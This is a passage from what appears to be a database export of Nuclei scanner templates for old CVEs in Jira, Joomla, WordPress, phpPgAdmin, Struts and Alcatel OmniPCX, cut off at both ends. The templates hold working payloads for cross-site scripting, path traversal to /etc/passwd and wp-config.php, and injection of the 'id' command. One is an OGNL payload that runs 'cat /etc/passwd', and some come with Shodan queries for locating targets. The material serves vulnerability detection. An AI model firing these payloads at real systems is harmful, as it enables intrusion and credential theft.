cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability.\n reference:\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418\n - https://nvd.nist.gov/vuln/detail/CVE-2007-0885\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2007-0885\n cwe-id: NVD-CWE-Other\n epss-score: 0.0093\n epss-percentile: 0.82626\n cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rainbow_portal\n product: rainbow.zen\n tags: cve,cve2007,jira,xss,rainbow_portal\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950", "hash": "002a7bac89e42f4332b45ad733f8ff8a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e41" }, "name": "CVE-2007-3010.yaml", "content": "id: CVE-2007-3010\n\ninfo:\n name: Alcatel-Lucent OmniPCX - Remote Command Execution\n author: king-alexander\n severity: critical\n description: |\n The OmniPCX web interface has a script \"masterCGI\" with a remote command execution vulnerability via the \"user\" parameter.\n impact: |\n Any unauthenticated attacker who can reach the web interface (the CVSS vector is AV:N/Au:N) can execute arbitrary operating-system commands with the privileges of the web server process. This template injects a real command (id) through the user parameter, so a match means the command actually ran on the target.\n remediation: |\n Update to supported 
versions that filter shell metacharacters in the \"user\" parameter.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2007-3010\n - https://marc.info/?l=full-disclosure&m=119002152126755&w=2\n - http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php\n - http://www.vupen.com/english/advisories/2007/3185\n - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2007-3010\n cwe-id: CWE-20\n epss-score: 0.97317\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: alcatel-lucent\n product: omnipcx\n shodan-query: title:\"OmniPCX for Enterprise\"\n fofa-query: app=\"Alcatel_Lucent-OmniPCX-Enterprise\"\n tags: cve,cve2007,kev,rce,alcatel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"uid=[0-9]+.*gid=[0-9]+.*\"\n\n - type: word\n part: body\n words:\n - \"master\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950", "hash": "7692b4ea20a13b77e3a6bcc46a88d01e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e42" }, "name": "CVE-2007-4504.yaml", "content": "id: CVE-2007-4504\n\ninfo:\n name: Joomla! RSfiles <=1.0.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. 
(dot dot) in the path parameter in a files.display action.\n impact: |\n Successful exploitation lets an unauthenticated attacker read arbitrary files that the web server process can access, such as /etc/passwd (which this template checks) or configuration files containing credentials. The CVSS vector (C:P/I:N/A:N) reflects confidentiality impact only; this is an arbitrary file read, not remote code execution.\n remediation: |\n Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/4307\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222\n - https://nvd.nist.gov/vuln/detail/CVE-2007-4504\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2007-4504\n cwe-id: CWE-22\n epss-score: 0.02599\n epss-percentile: 0.90043\n cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: rsfiles\n tags: cve2007,cve,lfi,edb,joomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950", "hash": "a60caf4b57fa7b616fa70c98d5ea5cbc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e43" }, "name": "CVE-2007-4556.yaml", "content": "id: CVE-2007-4556\n\ninfo:\n name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution\n author: pikpikcu\n severity: medium\n description: |\n Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute 
arbitrary code via form input beginning with a \"%{\" sequence and ending with a \"}\" character.\n impact: |\n Remote code execution: the injected OGNL expression is evaluated server-side, so an unauthenticated attacker can run arbitrary Java code, including operating-system commands, as the application server user. Note that this template does not use a harmless probe expression; it runs cat /etc/passwd on the target through java.lang.ProcessBuilder and reads the output back, which is intrusive and leaves traces in process and application logs.\n remediation: |\n Upgrade XWork to 1.2.3 or later (2.0.4 or later on the 2.x line), or to a Struts 2 release that includes the S2-001 fix; as an interim mitigation, disable altSyntax so that user input is no longer evaluated as OGNL.\n reference:\n - https://www.guildhab.top/?p=2326\n - https://nvd.nist.gov/vuln/detail/CVE-2007-4556\n - https://cwiki.apache.org/confluence/display/WW/S2-001\n - http://forums.opensymphony.com/ann.jspa?annID=54\n - http://issues.apache.org/struts/browse/WW-2030\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2007-4556\n cwe-id: NVD-CWE-Other\n epss-score: 0.16469\n epss-percentile: 0.95873\n cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opensymphony\n product: xwork\n tags: cve,cve2007,apache,rce,struts,opensymphony\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login.action\"\n\n body: |\n username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950", "hash": "fc7f520acf098ea346336c7193876fa9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307e44" }, "name": "CVE-2007-5728.yaml", "content": "id: CVE-2007-5728\n\ninfo:\n name: phpPgAdmin <=4.1.1 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/30090\n - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html\n - https://nvd.nist.gov/vuln/detail/CVE-2007-5728\n - http://www.debian.org/security/2008/dsa-1693\n - http://www.novell.com/linux/security/advisories/2007_24_sr.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2007-5728\n cwe-id: CWE-79\n epss-score: 0.02361\n epss-percentile: 0.88734\n cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phppgadmin\n product: phppgadmin\n shodan-query: http.title:\"phpPgAdmin\"\n tags: cve2007,cve,xss,pgadmin,phppgadmin,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'phpPgAdmin'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022070fd863c2346a1262a1c6a87c2bf86b8a29a953f0bb6e8e24b6988aef07dcdde022100de1eb0f49138ab29c4ba04a2020fb9075ad7b3e9c9f82629d21eee375c325b40:922c64590222798bb761d5b6d8e72950", "hash": "7c1541a9a8cb2a757759573bd21562f1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e45" }, "name": "CVE-2008-1059.yaml", "content": "id: CVE-2008-1059\n\ninfo:\n name: WordPress Sniplets 1.1.2 - Local File Inclusion\n author: dhiyaneshDK\n severity: high\n description: |\n PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. The same unchecked include also accepts local paths; this template exercises that local variant by traversing to wp-config.php, so a match means the WordPress database credentials (DB_NAME, DB_PASSWORD) are readable by an unauthenticated attacker.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.\n remediation: |\n Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the file inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5194\n - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1059\n - http://securityreason.com/securityalert/3706\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2008-1059\n cwe-id: CWE-94\n epss-score: 0.01493\n epss-percentile: 0.86573\n cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: sniplets_plugin\n tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n 
condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950", "hash": "00640cbcb752ba82c7dedb3f494f6af0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e46" }, "name": "CVE-2008-1061.yaml", "content": "id: CVE-2008-1061\n\ninfo:\n name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5194\n - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1061\n - http://securityreason.com/securityalert/3706\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-1061\n cwe-id: CWE-79\n epss-score: 0.00663\n epss-percentile: 0.77516\n cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: sniplets_plugin\n tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets\n\nflow: 
http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Code Snippets'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950", "hash": "d483a32b1d482b688fd2b3d0eedb94b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e47" }, "name": "CVE-2008-1547.yaml", "content": "id: CVE-2008-1547\n\ninfo:\n name: Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n impact: |\n An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks.\n remediation: |\n Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2008-1547\n - https://www.exploit-db.com/exploits/32489\n - http://securityreason.com/securityalert/4441\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-1547\n cwe-id: CWE-601\n 
epss-score: 0.03875\n epss-percentile: 0.9108\n cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: microsoft\n product: exchange_server\n shodan-query: http.title:\"Outlook\"\n tags: cve2008,cve,redirect,owa,exchange,microsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh\"\n - \"{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950", "hash": "1f7a590dc849062c8cf874b72d9d1cae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e48" }, "name": "CVE-2008-2398.yaml", "content": "id: CVE-2008-2398\n\ninfo:\n name: AppServ Open Project <=2.5.10 - Cross-Site Scripting\n author: unstabl3\n severity: medium\n description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.\n reference:\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546\n - http://securityreason.com/securityalert/3896\n - https://nvd.nist.gov/vuln/detail/CVE-2008-2398\n classification:\n cvss-metrics: 
CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-2398\n cwe-id: CWE-79\n epss-score: 0.00329\n epss-percentile: 0.67909\n cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: appserv_open_project\n product: appserv\n tags: cve2008,cve,xss,appserv_open_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e5f69285583054049dc882b6007c931a7249001e67d2592ec4dbab04b3e63d0b022036b288a25c5ddf0370be06576e1ee68cb3e76729998201373b7d00e187422cd6:922c64590222798bb761d5b6d8e72950", "hash": "9ee057ef44c2ad32fce2466312323793", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e49" }, "name": "CVE-2008-2650.yaml", "content": "id: CVE-2008-2650\n\ninfo:\n name: CMSimple 3.1 - Local File Inclusion\n author: pussycat0x\n severity: medium\n description: |\n CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. 
NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.\n reference:\n - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17\n - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463\n - https://nvd.nist.gov/vuln/detail/CVE-2008-2650\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2008-2650\n cwe-id: CWE-22\n epss-score: 0.06344\n epss-percentile: 0.93486\n cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cmsimple\n product: cmsimple\n tags: cve,cve2008,lfi,cmsimple\n\nhttp:\n - raw:\n - |\n GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950", "hash": "2f141295d1b2d8547892581671eff074", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4a" }, "name": "CVE-2008-4668.yaml", "content": "id: CVE-2008-4668\n\ninfo:\n name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion\n author: daffainfo\n severity: critical\n description: Joomla! 
Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6618\n - http://securityreason.com/securityalert/4464\n - https://nvd.nist.gov/vuln/detail/CVE-2008-4668\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/45490\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P\n cvss-score: 9\n cve-id: CVE-2008-4668\n cwe-id: CWE-22\n epss-score: 0.01018\n epss-percentile: 0.83418\n cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: com_imagebrowser\n tags: cve2008,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022063b96588b6252e04e12101a7ef9a2744b1ad191e0f2e42b4cea08a43b7e42f35022057a31c495c450ec89adc4ad386b5203ac3b15d93fe5224986eb90f9b47ca4967:922c64590222798bb761d5b6d8e72950", "hash": "ed97b9081808484f502c779b1b555565", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4b" }, "name": "CVE-2008-4764.yaml", "content": "id: CVE-2008-4764\n\ninfo:\n name: Joomla! <=2.0.0 RC2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! 
2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.\n remediation: |\n Upgrade Joomla! to a version higher than 2.0.0 RC2 to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/5435\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873\n - https://nvd.nist.gov/vuln/detail/CVE-2008-4764\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-4764\n cwe-id: CWE-22\n epss-score: 0.02365\n epss-percentile: 0.89577\n cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: extplorer\n product: com_extplorer\n tags: cve,cve2008,edb,joomla,lfi,extplorer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950", "hash": "3452ba08919d0797be1cdfd39ef453ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4c" }, "name": "CVE-2008-5587.yaml", "content": "id: CVE-2008-5587\n\ninfo:\n name: phpPgAdmin <=4.2.1 - Local File Inclusion\n author: dhiyaneshDK\n severity: medium\n description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register_globals is enabled. Remote attackers can read arbitrary files via a .. 
(dot dot) in the _language parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.\n remediation: |\n Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/7363\n - https://nvd.nist.gov/vuln/detail/CVE-2008-5587\n - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html\n - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html\n - http://securityreason.com/securityalert/4737\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2008-5587\n cwe-id: CWE-22\n epss-score: 0.02331\n epss-percentile: 0.88625\n cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phppgadmin\n product: phppgadmin\n shodan-query: http.title:\"phpPgAdmin\"\n tags: cve,cve2008,lfi,phppgadmin,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950", "hash": "7dce46555b1fc36009cfcbf5e5fccad4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4d" }, "name": "CVE-2008-6080.yaml", "content": "id: CVE-2008-6080\n\ninfo:\n name: Joomla! ionFiles 4.4.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. 
(dot dot) in the file parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/6809\n - https://nvd.nist.gov/vuln/detail/CVE-2008-6080\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2008-6080\n cwe-id: CWE-22\n epss-score: 0.03314\n epss-percentile: 0.90395\n cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: codecall\n product: com_ionfiles\n tags: cve,cve2008,edb,joomla,lfi,codecall\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205ae540f2d6cbc68c64570307fdf0bdf36a2b7acd80b4eee7f37e87fe1a215408022001a5e8067cb4740653e558dcafa619df1481f916f8dddb073b404630e6703a24:922c64590222798bb761d5b6d8e72950", "hash": "bf28289121868dae0979b2144f2d99e7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e4e" }, "name": 